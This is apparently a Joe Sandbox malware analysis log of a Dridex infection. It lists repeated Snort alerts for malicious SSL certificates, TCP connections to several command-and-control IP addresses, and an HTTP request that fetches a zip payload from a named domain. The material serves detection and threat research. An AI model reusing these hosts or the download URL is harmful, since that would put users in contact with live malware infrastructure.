Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49257
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49259
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49260
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49261
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49261
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49263
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49264
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49265
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49265
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49267
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49268
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49269
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49269
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49271
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49272
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49273
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49273
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49275
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49276
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49277
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49277
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49279
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49280
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49281
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49281
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49283
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49284
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49285
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49285
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49287
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49288
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49289
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49289
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49291
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49292
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49293
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49293
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49295
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49296
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49297
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49297
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49299
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49300
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49301
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49301
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49304
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49305
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49305
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49307
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49308
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49309
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49309
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49311
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49312
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49313
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49315
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49316
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49317
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49317
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49319
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49320
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49321
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49321
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49323
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49324
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49325
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49325
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49327
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49328
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49329
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49329
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49331
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49332
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49333
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49333
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49335
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49336
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49337
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49337
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49339
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49340
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49341
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49341
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49343
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49344
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49345
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49345
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49347
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49348
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49349
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49349
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49351
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49352
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49353
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49353
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49355
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49356
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49357
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49357
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49359
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49360
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49361
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49361
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49363
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49364
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49365
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49365
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49367
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49368
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49369
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49369
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49371
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49372
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49373
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49373
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49375
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49376
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49377
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49377
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49379
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49380
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49381
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49381
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49383
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49384
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49385
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49385
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49387
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49388
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49389
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49389
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49391
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49392
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49393
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49393
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49395
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49396
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49397
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49397
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49399
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49400
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49401
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49401
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49403
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49404
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49405
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49405
Source: global trafficTCP traffic: 192.168.2.22:49170 -> 80.86.91.27:3308
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 5.100.228.233:3389
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 46.105.131.65:1512
Source: Joe Sandbox ViewIP Address: 77.220.64.37 77.220.64.37
Source: Joe Sandbox ViewASN Name: SENTIANL SENTIANL
Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
Source: Joe Sandbox ViewJA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: global trafficHTTP traffic detected: GET /eb3kd1le.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: inmindppe.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004939F9 InternetReadFile,
